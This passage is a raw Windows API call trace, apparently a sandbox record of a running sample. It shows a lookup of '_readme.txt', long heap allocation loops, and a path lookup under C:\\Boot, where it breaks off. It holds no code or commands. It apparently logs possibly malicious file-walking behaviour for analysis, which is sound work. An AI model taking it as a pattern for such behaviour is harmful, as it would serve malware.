lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eb45b50, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eb45b50, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb45b50, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0146.536] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.536] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.536] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.536] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.536] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.536] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.537] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.537] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.537] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.537] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.537] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.537] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.537] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.537] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.537] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.537] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.537] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.537] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.537] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.537] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.537] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.537] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.537] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.537] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.537] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.537] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.537] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.537] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.537] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.537] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.537] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.537] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.537] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.537] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.537] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.537] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.537] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.537] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.537] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.537] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.537] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.537] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.537] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.537] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.537] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.537] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.538] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.538] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.538] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.538] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.538] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.538] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.538] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.538] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.538] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.538] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.538] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.538] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.538] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.538] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.538] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.538] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.538] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.538] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.538] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.538] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.538] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.538] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.538] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.538] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.538] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.538] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.538] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.538] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.538] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.538] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.538] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.538] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.538] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.538] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.538] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.538] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.538] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.538] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.538] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.539] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.539] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.539] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.539] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.539] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.539] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.539] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.539] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.539] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.539] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.539] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.539] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.539] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.539] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.539] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.539] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.539] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.539] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.539] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.539] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.539] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.539] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.539] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.539] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.539] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.539] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.539] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.539] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.539] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.539] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.539] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.539] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.539] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.539] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.539] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.539] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.539] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.539] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.540] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.540] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.540] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.540] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.540] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.540] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.540] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.540] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.540] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.540] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.540] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.540] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.540] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.540] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.540] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.540] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.540] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.540] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.540] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.540] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.540] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.540] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.540] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.540] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.540] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.540] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.540] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.540] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.540] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.540] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.540] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.540] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.540] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.540] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.540] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.540] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.540] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.540] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.541] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.541] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.541] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.541] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.541] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.541] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.541] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.541] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.541] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.541] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.541] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.541] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.541] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.541] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.541] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.541] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.541] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.541] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.541] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.541] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.541] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.541] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.541] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.541] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.541] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.541] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.541] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.541] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.541] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.541] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.541] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.541] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.541] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.541] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.541] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.541] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.541] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.541] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.542] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.542] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.542] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.542] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.542] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.542] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.542] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.542] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.542] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.542] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.542] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.542] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.542] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.542] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.542] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.542] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.542] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.542] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.542] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.542] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.542] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.542] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.542] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.542] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.542] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.542] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.542] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.542] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.542] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.542] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.542] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.542] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.542] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.542] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.542] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.542] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.543] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.543] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.543] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.543] PathFindFileNameW (pszPath="C:\\Boot\\hu-HU\\") 